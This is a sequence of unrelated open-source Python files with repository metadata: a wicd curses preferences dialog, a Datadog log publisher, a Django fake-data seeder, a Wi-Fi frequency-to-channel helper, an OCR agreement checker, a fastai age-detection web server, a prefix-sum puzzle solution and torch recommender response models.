urwid.AttrWrap(SelText(header1_t), 'body', 'focus')\n self.header2 = urwid.AttrWrap(SelText(header2_t), 'body', 'focus')\n title = ('Preferences')\n\n # Blank line\n _blank = urwid.Text('')\n\n ####\n #### Text in the widgets\n ####\n\n # General Settings\n net_cat_t = ('header', ('Network Interfaces'))\n wired_t = ('editcp', ('Wired Interface') + ': ')\n wless_t = ('editcp', ('Wireless Interface') + ':')\n always_show_wired_t = _('Always show wired interface')\n prefer_wired_t = _('Always switch to wired connection when available')\n\n global_dns_cat_t = ('header', _('Global DNS servers'))\n global_dns_t = ('editcp', _('Use global DNS servers'))\n dns_dom_t = ('editcp', ' ' + _('DNS domain') + ': ')\n search_dom_t = ('editcp', ' ' + _('Search domain') + ':')\n dns1_t = ('editcp', ' ' + _('DNS server') + ' 1: ')\n dns2_t = ('editcp', ' ' + _('DNS server') + ' 2: ')\n dns3_t = ('editcp', ' ' + _('DNS server') + ' 3: ')\n\n wired_auto_cat_t = ('header', _('Wired Autoconnect Settings'))\n wired_auto_1_t = _('Use default profile on wired autoconnect')\n wired_auto_2_t = _('Prompt for profile on wired autoconnect')\n wired_auto_3_t = _('Use last used profile on wired autoconnect')\n\n auto_reconn_cat_t = ('header', _('Automatic Reconnection'))\n auto_reconn_t = _('Automatically reconnect on connection loss')\n\n #### External Programs\n automatic_t = _('Automatic (recommended)')\n\n dhcp_header_t = ('header', _('DHCP Client'))\n # Automatic\n dhcp1_t = 'dhclient'\n dhcp2_t = 'dhcpcd'\n dhcp3_t = 'pump'\n dhcp4_t = 'udhcpc'\n\n wired_detect_header_t = ('header', _('Wired Link Detection'))\n wired1_t = 'ethtool'\n wired2_t = 'mii-tool'\n\n flush_header_t = ('header', _('Route Table Flushing'))\n flush1_t = 'ip'\n flush2_t = 'route'\n\n #### Advanced Settings\n wpa_cat_t = ('header', _('WPA Supplicant'))\n wpa_t = ('editcp', 'Driver:')\n wpa_list = []\n wpa_warn_t = ('important',\n _('You should almost always use wext as the WPA supplicant driver'))\n\n backend_cat_t = ('header', _('Backend'))\n backend_t = _('Backend') + ':'\n backend_list = []\n\n debug_cat_t = ('header', _('Debugging'))\n debug_mode_t = _('Enable debug mode')\n\n wless_cat_t = ('header', _('Wireless Interface'))\n use_dbm_t = _('Use dBm to measure signal strength')\n verify_ap_t = \\\n _('Ping static gateways after connecting to 
verify association')\n\n ####\n #### UI Widgets\n ####\n\n # General Settings\n self.net_cat = urwid.Text(net_cat_t)\n self.wired_edit = \\\n urwid.AttrWrap(urwid.Edit(wired_t), 'editbx', 'editfc')\n self.wless_edit = \\\n urwid.AttrWrap(urwid.Edit(wless_t), 'editbx', 'editfc')\n self.prefer_wired_chkbx = urwid.CheckBox(prefer_wired_t)\n self.global_dns_cat = urwid.Text(global_dns_cat_t)\n # Default the global DNS settings to off. They will be reenabled later\n # if so required.\n global_dns_state = False\n self.global_dns_checkb = urwid.CheckBox(global_dns_t,\n global_dns_state,\n on_state_change=self.global_dns_trigger\n )\n self.search_dom = DynWrap(urwid.Edit(search_dom_t), global_dns_state)\n self.dns_dom = DynWrap(urwid.Edit(dns_dom_t), global_dns_state)\n self.dns1 = DynWrap(urwid.Edit(dns1_t), global_dns_state)\n self.dns2 = DynWrap(urwid.Edit(dns2_t), global_dns_state)\n self.dns3 = DynWrap(urwid.Edit(dns3_t), global_dns_state)\n\n self.always_show_wired_checkb = urwid.CheckBox(always_show_wired_t)\n\n self.wired_auto_l = []\n self.wired_auto_cat = urwid.Text(wired_auto_cat_t)\n self.wired_auto_1 = urwid.RadioButton(self.wired_auto_l, wired_auto_1_t)\n self.wired_auto_2 = urwid.RadioButton(self.wired_auto_l, wired_auto_2_t)\n self.wired_auto_3 = urwid.RadioButton(self.wired_auto_l, wired_auto_3_t)\n\n self.auto_reconn_cat = urwid.Text(auto_reconn_cat_t)\n self.auto_reconn_checkb = urwid.CheckBox(auto_reconn_t)\n generalLB = urwid.ListBox([\n self.net_cat,\n self.wless_edit, # _blank,\n self.wired_edit,\n self.always_show_wired_checkb,\n self.prefer_wired_chkbx, _blank,\n self.global_dns_cat,\n self.global_dns_checkb, # _blank,\n self.search_dom, self.dns_dom,\n self.dns1, self.dns2, self.dns3, _blank,\n self.wired_auto_cat,\n self.wired_auto_1,\n self.wired_auto_2,\n self.wired_auto_3, _blank,\n self.auto_reconn_cat,\n self.auto_reconn_checkb\n ])\n\n #### External Programs tab\n automatic_t = _('Automatic (recommended)')\n\n self.dhcp_header = urwid.Text(dhcp_header_t)\n self.dhcp_l = []\n\n # Order of these is flipped in the actual interface,\n # (2, 3, 1 -> dhcpcd, pump, dhclient), because dhclient often doesn't\n # like to work on several distros.\n self.dhcp0 = urwid.RadioButton(self.dhcp_l, automatic_t)\n self.dhcp1 = DynRadioButton(self.dhcp_l, dhcp1_t)\n self.dhcp2 = DynRadioButton(self.dhcp_l, dhcp2_t)\n self.dhcp3 = DynRadioButton(self.dhcp_l, dhcp3_t)\n self.dhcp4 = DynRadioButton(self.dhcp_l, dhcp4_t)\n self.dhcp_l = [\n self.dhcp0, self.dhcp1, self.dhcp2, self.dhcp3, self.dhcp4\n ]\n\n self.wired_l = []\n self.wired_detect_header = urwid.Text(wired_detect_header_t)\n self.wired0 = urwid.RadioButton(self.wired_l, automatic_t)\n self.wired1 = DynRadioButton(self.wired_l, wired1_t)\n self.wired2 = DynRadioButton(self.wired_l, wired2_t)\n self.wired_l = [self.wired0, self.wired1, self.wired2]\n\n self.flush_l = []\n self.flush_header = urwid.Text(flush_header_t)\n self.flush0 = urwid.RadioButton(self.flush_l, automatic_t)\n self.flush1 = DynRadioButton(self.flush_l, flush1_t)\n self.flush2 = DynRadioButton(self.flush_l, flush2_t)\n self.flush_l = [self.flush0, self.flush1, self.flush2]\n\n externalLB = urwid.ListBox([\n self.dhcp_header,\n self.dhcp0, self.dhcp2, self.dhcp3, self.dhcp1, self.dhcp4,\n _blank,\n self.wired_detect_header,\n self.wired0, self.wired1, self.wired2,\n _blank,\n self.flush_header,\n self.flush0, self.flush1, self.flush2\n ])\n\n #### Advanced settings\n self.wpa_cat = urwid.Text(wpa_cat_t)\n self.wpa_cbox = ComboBox(wpa_t)\n self.wpa_warn = 
urwid.Text(wpa_warn_t)\n\n        self.backend_cat = urwid.Text(backend_cat_t)\n        self.backend_cbox = ComboBox(backend_t)\n\n        self.debug_cat = urwid.Text(debug_cat_t)\n        self.debug_mode_checkb = urwid.CheckBox(debug_mode_t)\n\n        self.wless_cat = urwid.Text(wless_cat_t)\n        self.use_dbm_checkb = urwid.CheckBox(use_dbm_t)\n        self.verify_ap_checkb = urwid.CheckBox(verify_ap_t)\n\n        advancedLB = urwid.ListBox([\n            self.wpa_cat,\n            self.wpa_cbox, self.wpa_warn, _blank,\n            self.backend_cat,\n            self.backend_cbox, _blank,\n            self.debug_cat,\n            self.debug_mode_checkb, _blank,\n            self.wless_cat,\n            self.use_dbm_checkb, _blank,\n            self.verify_ap_checkb, _blank\n        ])\n\n        headerList = [self.header0, self.header1, self.header2]\n        lbList = [generalLB, externalLB, advancedLB]\n        self.tab_map = {\n            self.header0: generalLB,\n            self.header1: externalLB,\n            self.header2: advancedLB\n        }\n        #self.load_settings()\n\n        self.tabs = TabColumns(headerList, lbList, _('Preferences'))\n        # pylint: disable-msg=E1101\n        self.__super.__init__(self.tabs)\n\n    def load_settings(self):\n        \"\"\" Load settings to be used in the dialog. \"\"\"\n        ### General Settings\n        # ComboBox does not like dbus.Strings as text markups. My fault. :/\n        wless_iface = unicode(daemon.GetWirelessInterface())\n        wired_iface = unicode(daemon.GetWiredInterface())\n        self.wless_edit.set_edit_text(wless_iface)\n        self.wired_edit.set_edit_text(wired_iface)\n\n        self.always_show_wired_checkb.set_state(\n            daemon.GetAlwaysShowWiredInterface())\n        self.prefer_wired_chkbx.set_state(daemon.GetPreferWiredNetwork())\n        # DNS\n        self.global_dns_checkb.set_state(daemon.GetUseGlobalDNS())\n        theDNS = daemon.GetGlobalDNSAddresses()\n\n        i = 0\n        for w in self.dns1, self.dns2, self.dns3, self.dns_dom, self.search_dom:\n            w.set_edit_text(misc.noneToBlankString(theDNS[i]))\n            i += 1\n\n        # Wired Automatic Connection\n        self.wired_auto_l[daemon.GetWiredAutoConnectMethod() - 1].set_state(True)\n        self.auto_reconn_checkb.set_state(daemon.GetAutoReconnect())\n\n        def find_avail(apps):\n            \"\"\" Find available apps. 
\"\"\"\n for app in apps[1:]:\n app.set_sensitive(daemon.GetAppAvailable(app.get_label()))\n\n ### External Programs\n find_avail(self.dhcp_l)\n dhcp_method = daemon.GetDHCPClient()\n self.dhcp_l[dhcp_method].set_state(True)\n\n find_avail(self.wired_l)\n wired_link_method = daemon.GetLinkDetectionTool()\n self.wired_l[wired_link_method].set_state(True)\n\n find_avail(self.flush_l)\n flush_method = daemon.GetFlushTool()\n self.flush_l[flush_method].set_state(True)\n\n ### Advanced settings\n # wpa_supplicant janx\n self.wpadrivers = wireless.GetWpaSupplicantDrivers()\n self.wpadrivers.append(\"ralink_legacy\")\n self.wpadrivers.append('none')\n # Same as above with the dbus.String\n self.thedrivers = [unicode(w) for w in self.wpadrivers]\n self.wpa_cbox.set_list(self.thedrivers)\n\n # Pick where to begin first:\n def_driver = daemon.GetWPADriver()\n try:\n self.wpa_cbox.set_focus(self.wpadrivers.index(def_driver))\n except ValueError:\n pass # It defaults to 0 anyway (I hope)\n\n self.backends = daemon.GetBackendList()\n self.thebackends = [unicode(w) for w in self.backends]\n self.backend_cbox.set_list(self.thebackends)\n cur_backend = daemon.GetSavedBackend()\n try:\n self.backend_cbox.set_focus(self.thebackends.index(cur_backend))\n except ValueError:\n self.backend_cbox.set_focus(0)\n\n # Three last checkboxes\n self.debug_mode_checkb.set_state(daemon.GetDebugMode())\n self.use_dbm_checkb.set_state(daemon.GetSignalDisplayType())\n self.verify_ap_checkb.set_state(daemon.GetShouldVerifyAp())\n\n def save_settings(self):\n \"\"\" Pushes the selected settings to the daemon.\n This exact order is found in prefs.py\"\"\"\n daemon.SetUseGlobalDNS(self.global_dns_checkb.get_state())\n\n for i in [\n self.dns1, self.dns2, self.dns3,\n self.dns_dom, self.search_dom, self.dns_dom\n ]:\n i.set_edit_text(i.get_edit_text().strip())\n\n daemon.SetGlobalDNS(\n self.dns1.get_edit_text(),\n self.dns2.get_edit_text(),\n self.dns3.get_edit_text(),\n self.dns_dom.get_edit_text(),\n self.search_dom.get_edit_text()\n )\n daemon.SetWirelessInterface(self.wless_edit.get_edit_text())\n daemon.SetWiredInterface(self.wired_edit.get_edit_text())\n daemon.SetWPADriver(self.wpadrivers[self.wpa_cbox.get_focus()[1]])\n daemon.SetAlwaysShowWiredInterface(\n self.always_show_wired_checkb.get_state()\n )\n daemon.SetAutoReconnect(self.auto_reconn_checkb.get_state())\n daemon.SetDebugMode(self.debug_mode_checkb.get_state())\n daemon.SetSignalDisplayType(int(self.use_dbm_checkb.get_state()))\n daemon.SetShouldVerifyAp(int(self.verify_ap_checkb.get_state()))\n daemon.SetPreferWiredNetwork(bool(self.prefer_wired_chkbx.get_state()))\n if self.wired_auto_2.get_state():\n daemon.SetWiredAutoConnectMethod(2)\n elif self.wired_auto_3.get_state():\n daemon.SetWiredAutoConnectMethod(3)\n else:\n daemon.SetWiredAutoConnectMethod(1)\n\n daemon.SetBackend(self.backends[self.backend_cbox.get_focus()[1]])\n\n # External Programs Tab\n if self.dhcp0.get_state():\n dhcp_client = misc.AUTO\n elif self.dhcp1.get_state():\n dhcp_client = misc.DHCLIENT\n elif self.dhcp2.get_state():\n dhcp_client = misc.DHCPCD\n elif self.dhcp3.get_state():\n dhcp_client = misc.PUMP\n else:\n dhcp_client = misc.UDHCPC\n daemon.SetDHCPClient(dhcp_client)\n\n if self.wired0.get_state():\n link_tool = misc.AUTO\n elif self.wired1.get_state():\n link_tool = misc.ETHTOOL\n else:\n link_tool = misc.MIITOOL\n daemon.SetLinkDetectionTool(link_tool)\n\n if self.flush0.get_state():\n flush_tool = misc.AUTO\n elif self.flush1.get_state():\n flush_tool = misc.IP\n 
else:\n flush_tool = misc.ROUTE\n daemon.SetFlushTool(flush_tool)\n\n def global_dns_trigger(self, check_box, new_state, user_data=None):\n \"\"\" DNS CheckBox callback. \"\"\"\n for w in self.dns1, self.dns2, self.dns3, self.dns_dom, self.search_dom:\n w.set_sensitive(new_state)\n\n def ready_widgets(self, ui, body):\n \"\"\" Build comboboxes. \"\"\"\n self.wpa_cbox.build_combobox(body, ui, 4)\n self.backend_cbox.build_combobox(body, ui, 8)\n","repo_name":"dpaleino/wicd","sub_path":"curses/prefs_curses.py","file_name":"prefs_curses.py","file_ext":"py","file_size_in_byte":14937,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"53"} +{"seq_id":"16434828075","text":"import string\nfrom typing import Union\n\nfrom datadog_api_client import ApiClient, Configuration\nfrom datadog_api_client.v2.api.logs_api import LogsApi\nfrom datadog_api_client.v2.model.content_encoding import ContentEncoding\nfrom datadog_api_client.v2.model.http_log import HTTPLog\nfrom datadog_api_client.v2.model.http_log_item import HTTPLogItem\n\n\nclass LogPublisher:\n def __init__(self,\n application_name: str,\n svc_name: str,\n svc_type: str,\n team: str,\n api_key: dict):\n self.api_key = api_key\n self.application_name = application_name\n self.svc_name = svc_name\n self.svc_type = svc_type\n self.team = team\n self.configuration = Configuration(api_key=api_key)\n self.api_client = ApiClient(self.configuration)\n self.api_instance = LogsApi(self.api_client)\n\n def construct_final_tags(self, extra_tags: set = None) -> Union[str]:\n tags = {\n 'application:{}'.format(self.application_name),\n 'service_type: {}'.format(self.svc_type),\n 'service: {}'.format(self.svc_name),\n 'team: {}'.format(self.team)\n }\n\n if extra_tags is None:\n extra_tags = {}\n\n final_tags = tags.union(extra_tags)\n return ', '.join(final_tags)\n\n def construct_payload(self, log_msg: str, log_level: str, extra_tags: set = None) -> HTTPLog:\n body = HTTPLog(\n [\n HTTPLogItem(\n message=log_msg,\n service=self.svc_name,\n status=log_level,\n ddtags=self.construct_final_tags(extra_tags)\n )\n ]\n )\n return body\n\n def publish_log_to_datadog(self, log_msg: string, log_level: str = \"INFO\", extra_tags: set = None):\n body = self.construct_payload(log_msg, log_level, extra_tags)\n response = self.api_instance.submit_log(content_encoding=ContentEncoding.GZIP, body=body)\n\n\n","repo_name":"pranavdua/oi_reports_ODS_1596","sub_path":"oi_reports/remote_logging/datadog_ops.py","file_name":"datadog_ops.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2038235906","text":"import os \nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'core.settings')\nimport random\n\n\nimport django \ndjango.setup() \n\nfrom faker import Faker \nfrom reviews.models import * \nfrom model_bakery.recipe import Recipe,foreign_key \n\n\nimport datetime\nstart_date = datetime.date(year=2021, month=1, day=1)\nend_date = datetime.date(year=2023, month=12, day=31)\n\nfake = Faker() \n\nfor k in range(4000):\n fake_date = fake.date_between(start_date=start_date, end_date=end_date)\n \n if Review.objects.filter(submitted_at=fake_date).exists():\n review = Review.objects.get(submitted_at=fake_date)\n question = Question.objects.get(id=random.randint(1,4))\n answer = Recipe(Answer, \n review=review,\n question=question,\n choice=random.choice(question.choices.all())) \n answer.make()\n print(\"1\", review)\n else:\n 
review=Recipe(Review, submitted_at=fake_date)\n question = Question.objects.get(id=random.randint(1,4))\n answer = Recipe(Answer, \n review=foreign_key(review),\n question=question,\n choice=random.choice(question.choices.all())) \n answer.make()\n print(\"2\", review)\n","repo_name":"fekrii/Django-Reviews","sub_path":"createReviewsData.py","file_name":"createReviewsData.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18076535013","text":"NumChannels = 140\nNumChannelsExt = 165 # see https://github.com/evilsocket/pwnagotchi/issues/583\n\n\ndef freq_to_channel(freq):\n if freq <= 2472:\n return int(((freq - 2412) / 5) + 1)\n elif freq == 2484:\n return int(14)\n elif 5035 <= freq <= 5865:\n return int(((freq - 5035) / 5) + 7)\n else:\n return 0\n","repo_name":"evilsocket/pwnagotchi","sub_path":"pwnagotchi/mesh/wifi.py","file_name":"wifi.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":6448,"dataset":"github-code","pt":"53"} +{"seq_id":"33801007974","text":"import json\nimport re\nimport sys\nfrom abc import ABC, abstractmethod\nfrom typing import Tuple, Dict, Union\n\nimport cv2\nimport pytesseract as tes\nfrom PIL import Image\n\nfrom onti import finder\n\n\ndef prepare(s: str):\n \"\"\"\n produces lowercase russian-only symbols\n :param s: given string\n :return: prepared string\n \"\"\"\n return re.sub(r'[^а-я0-9]', '', s.lower())\n\n\nclass Requirement(ABC):\n \"\"\"\n This abstract class corresponds to requirement. Any acceptable agreement should pass it's test.\n \"\"\"\n\n @abstractmethod\n def score(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, int]:\n \"\"\"\n scores text in some way\n :param image: whole image\n :param text: given text\n :param data: text data\n :return: remaining text and score\n \"\"\"\n pass\n\n @abstractmethod\n def compare(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, bool]:\n \"\"\"\n determines whether text contains requirement or not\n :param image: whole image\n :param text: given text\n :param data: text data\n :return: True if text is acceptable, False otherwise\n \"\"\"\n pass\n\n\nclass RequiredText(Requirement):\n \"\"\"\n This class corresponds to text data which should be represented in agreement.\n \"\"\"\n\n def __init__(self, record: Dict[str, Union[int, str]]):\n \"\"\"\n required text\n :param record: json record\n \"\"\"\n self.pattern: str = record[\"str\"]\n self.threshold: int = record.get(\"threshold\", 0)\n\n def score(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, int]:\n match = re.search(self.pattern, text)\n if match:\n return text[match.regs[0][1]:], 0\n return '', 100\n\n def compare(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, bool]:\n remaining, score = self.score(text, data, image)\n return remaining, score <= self.threshold\n\n def __repr__(self):\n return f'text: {self.pattern}'\n\n\nclass RequiredForm(Requirement):\n \"\"\"\n This class corresponds to some form in agreement which must be filled.\n \"\"\"\n\n def __init__(self, record: Dict[str, Union[int, str]]):\n \"\"\"\n required form\n :param record: json record\n \"\"\"\n self.left_anchor: str = record['left']\n self.right_anchor: str = record['right']\n self.threshold: int = record['threshold']\n\n def score(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> 
Tuple[str, int]:\n        left_index, right_index = None, None\n        for i, anchor_name in enumerate(data['text']):\n            if re.search(self.left_anchor, anchor_name, re.IGNORECASE):\n                left_index = i\n                break\n        if left_index is None:\n            return text, 0\n        for i, anchor_name in enumerate(data['text'][left_index + 1:]):\n            if re.search(self.right_anchor, anchor_name, re.IGNORECASE):\n                right_index = left_index + 1 + i\n                break\n        if right_index is None:\n            return text, 0\n        field = image.crop((data['left'][left_index] + data['width'][left_index], data['top'][left_index],\n                            data['left'][right_index], data['top'][right_index] + data['height'][right_index]))\n        # print(field.entropy())\n        return text, field.entropy()\n\n    def compare(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, bool]:\n        remaining, score = self.score(text, data, image)\n        return remaining, score * 100 >= self.threshold\n\n    def __repr__(self):\n        return f'form: \"{self.left_anchor}\" to \"{self.right_anchor}\"'\n\n\nclass RequiredOption(Requirement):\n    def __init__(self, record):\n        self.requirements = [process_requirement(requirement) for requirement in record[\"requirements\"]]\n\n    def score(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, int]:\n        result = 0\n        for requirement in self.requirements:\n            text, requirement_score = requirement.score(text, data, image)\n            result += requirement_score\n        return text, result\n\n    def compare(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, bool]:\n        for requirement in self.requirements:\n            text, requirement_passed = requirement.compare(text, data, image)\n            # print(f'block({requirement}) passed: {requirement_passed}')\n            if requirement_passed:\n                return text, True\n        return text, False\n\n    def __repr__(self):\n        return f\"option: {' or '.join([f'({requirement})' for requirement in self.requirements])}\"\n\n\nclass RequiredBlock(Requirement):\n    \"\"\"\n    This class corresponds to a list of requirements applied to agreement.\n    \"\"\"\n\n    def __init__(self, record):\n        self.requirements = [process_requirement(requirement) for requirement in record[\"requirements\"]]\n\n    def score(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, int]:\n        result = 0\n        for requirement in self.requirements:\n            text, requirement_score = requirement.score(text, data, image)\n            result += requirement_score\n        return text, result\n\n    def compare(self, text: str, data: Dict[str, Union[int, str]], image: Image) -> Tuple[str, bool]:\n        for requirement in self.requirements:\n            text, requirement_passed = requirement.compare(text, data, image)\n            # print(f'block({requirement}) passed: {requirement_passed}')\n            if not requirement_passed:\n                return text, False\n        return text, True\n\n\ndef process_requirement(record) -> Requirement:\n    return {\n        \"text\": RequiredText,\n        \"form\": RequiredForm,\n        \"block\": RequiredBlock,\n        \"option\": RequiredOption\n    }[record[\"type\"]](record)\n\n\ndef load_requirements(file_name: str) -> Dict[str, Requirement]:\n    with open(file_name, 'r') as file:\n        forms_dict = json.load(file)\n    result = dict()\n    for form_name, form_data in forms_dict.items():\n        result[form_name] = process_requirement(form_data)\n    return result\n\n\ndef process_image(file_name: str, form: Requirement) -> Tuple[str, bool]:\n    image = cv2.imread(file_name)\n    # image = cv2.resize(image, (1650, 2340))\n    # image = cv2.medianBlur(image, 3)\n    # image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n    image = finder.get_leveled_document(image)\n    
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n    temporary_file_name = '.temp.png'\n    cv2.imwrite(temporary_file_name, image)\n    ocr_image = Image.open(temporary_file_name)\n    # os.remove(temporary_file_name)\n    data = tes.image_to_data(ocr_image, lang='rus', output_type=tes.Output.DICT)\n    text = prepare(''.join(data['text']))\n    return form.compare(text, data, ocr_image)\n\n\ndef test():\n    requirements = load_requirements('./onti/forms.json')\n    print(process_image('test2.png', requirements[\"form1\"]))\n\n\ndef main():\n    file_name = sys.argv[1]\n    requirements = load_requirements('./onti/forms.json')\n    remaining_text, is_agreement = process_image(file_name, requirements[\"form1\"])\n    print('ok' if is_agreement else '')\n\n\nif __name__ == '__main__':\n    sys.argv.append(\"test3.jpg\")\n    main()\n","repo_name":"ekinohito/kruzhok.pro-first2","sub_path":"onti/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":7403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70205489768","text":"from starlette.applications import Starlette\nfrom starlette.responses import HTMLResponse, JSONResponse\nfrom starlette.staticfiles import StaticFiles\nfrom starlette.middleware.cors import CORSMiddleware\nimport uvicorn, aiohttp, asyncio\nfrom io import BytesIO\n\nfrom fastai import *\nfrom fastai.vision import *\n\nmodel_file_url = 'https://drive.google.com/uc?export=download&id=1u-JTF4yRqYdEg9PegCWCggQaX_pwop50'\nmodel_file_name = 'model2'\npath = Path(__file__).parent\n\napp = Starlette()\napp.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type'])\napp.mount('/static', StaticFiles(directory='app/static'))\n\nasync def download_file(url, dest):\n    if dest.exists(): return\n    async with aiohttp.ClientSession() as session:\n        async with session.get(url) as response:\n            data = await response.read()\n            with open(dest, 'wb') as f: f.write(data)\n\n\nasync def setup_learner():\n    await download_file(model_file_url, path/'models'/f'{model_file_name}.pth')\n    data_bunch = (ImageItemList.from_folder(path)\n                    .random_split_by_pct()\n                    .label_const(0, label_cls=FloatList)\n                    .transform(get_transforms(), size=224)\n                    .databunch()).normalize(imagenet_stats)\n    learn = create_cnn(data_bunch, models.resnet50, pretrained=False)\n    learn.load(model_file_name)\n    return learn\n\nloop = asyncio.get_event_loop()\ntasks = [asyncio.ensure_future(setup_learner())]\nlearn = loop.run_until_complete(asyncio.gather(*tasks))[0]\nloop.close()\n\n@app.route('/')\ndef index(request):\n    html = path/'view'/'index.html'\n    return HTMLResponse(html.open().read())\n\n@app.route('/analyze', methods=['POST'])\nasync def analyze(request):\n    data = await request.form()\n    img_bytes = await (data['file'].read())\n    img = open_image(BytesIO(img_bytes))\n    return JSONResponse({'result': int(round(float(learn.predict(img)[0][0]),0))})\n\nif __name__ == '__main__':\n    if 'serve' in sys.argv: uvicorn.run(app, host='0.0.0.0', port=5042)\n\n","repo_name":"btahir/age-detector","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"21316389797","text":"# An ugly number is a positive integer whose only prime factors are 2, 3, and 5.\r\n# Given an integer n, determine whether n is an ugly number: return true if it is, false otherwise.\r\nclass Solution:\r\n    def isUgly(self, n: int) -> bool:\r\n        if n <= 0:\r\n            return False\r\n        while n % 2 == 0:\r\n            n //= 2\r\n        while n % 3 == 0:\r\n            n //= 3\r\n        while n % 5 
== 0:\r\n            n //= 5\r\n        return n == 1","repo_name":"Ww0225/pythonTest","sub_path":"丑数.py","file_name":"丑数.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24737346227","text":"def solution(board, skill):\n    answer = 0\n    m = len(board[0])\n    n = 0\n    for _ in board:\n        n += 1\n    sum = [[0] * (m+1) for _ in range(n+1)]\n\n    for s in skill:\n        if s[0] == 1:\n            sum[s[1]][s[2]] -= s[5]\n            sum[s[1]][s[4]+1] += s[5]\n            sum[s[3]+1][s[2]] += s[5]\n            sum[s[3]+1][s[4]+1] -= s[5]\n        else:\n            sum[s[1]][s[2]] += s[5]\n            sum[s[1]][s[4]+1] -= s[5]\n            sum[s[3]+1][s[2]] -= s[5]\n            sum[s[3]+1][s[4]+1] += s[5]\n    \n    # compute the prefix sums\n    # left to right\n    for row in sum:\n        for i in range(1, len(row)):\n            row[i] += row[i-1] \n    # top to bottom\n    for j in range(len(sum)):\n        for i in range(1, len(sum)):\n            sum[i][j] += sum[i-1][j]\n\n    for i in range(n):\n        for j in range(m):\n            board[i][j] += sum[i][j]\n            if board[i][j] > 0:\n                answer += 1\n    \n    return answer\n    ","repo_name":"miseongk/Algorithm","sub_path":"Programmers/Level/Level3/92344.py","file_name":"92344.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21103635010","text":"import abc\nfrom typing import Any\n\nimport numpy as np\nimport numpy.typing as npt\nimport torch\n\n\nclass AbstractResponseModel(metaclass=abc.ABCMeta):\n    def __init__(self, null_response: float = -1.0) -> None:\n        self.null_response = null_response\n\n    @abc.abstractmethod\n    def generate_response(\n        self,\n        estimated_user_state: torch.Tensor,\n        doc_repr: torch.Tensor,\n    ) -> float:\n        \"\"\"\n        Generate the user response (reward) to a slate,\n        which is a function of the user state and the chosen document in the slate.\n\n        Args:\n            estimated_user_state (np.array): estimated user state\n            doc_repr (np.array): document representation\n\n        Returns:\n            float: user response\n        \"\"\"\n        pass\n\n    def generate_null_response(self) -> torch.Tensor:\n        return torch.tensor(self.null_response)\n\n\nclass AmplifiedResponseModel(AbstractResponseModel):\n    def __init__(self, amp_factor: int = 10, **kwds: Any) -> None:\n        super().__init__(**kwds)\n        self.amp_factor = amp_factor\n\n    @abc.abstractmethod\n    def _generate_response(\n        self,\n        estimated_user_state: npt.NDArray[np.float64],\n        doc_repr: npt.NDArray[np.float64],\n    ) -> float:\n        \"\"\"\n        Generate the user response (reward) to a slate,\n        which is a function of the user state and the chosen document in the slate.\n\n        Args:\n            estimated_user_state (np.array): estimated user state\n            doc_repr (np.array): document representation\n\n        Returns:\n            float: user response\n        \"\"\"\n        pass\n\n    def generate_response(\n        self,\n        estimated_user_state: torch.Tensor,\n        doc_repr: torch.Tensor,\n    ) -> float:\n        return self._generate_response(estimated_user_state, doc_repr) * self.amp_factor\n\n    def generate_null_response(self) -> float:\n        return super().generate_null_response() * self.amp_factor\n\n\nclass CosineResponseModel(AmplifiedResponseModel):\n    def _generate_response(\n        self,\n        estimated_user_state: torch.Tensor,\n        doc_repr: torch.Tensor,\n    ) -> float:\n        satisfaction = torch.nn.functional.cosine_similarity(\n            estimated_user_state, doc_repr, dim=0\n        )\n        return satisfaction\n\n\nclass DotProductResponseModel(AmplifiedResponseModel):\n    def _generate_response(\n        self,\n        estimated_user_state: torch.Tensor,\n        doc_repr: torch.Tensor,\n    ) -> float:\n        satisfaction = torch.dot(estimated_user_state, doc_repr)\n        return 
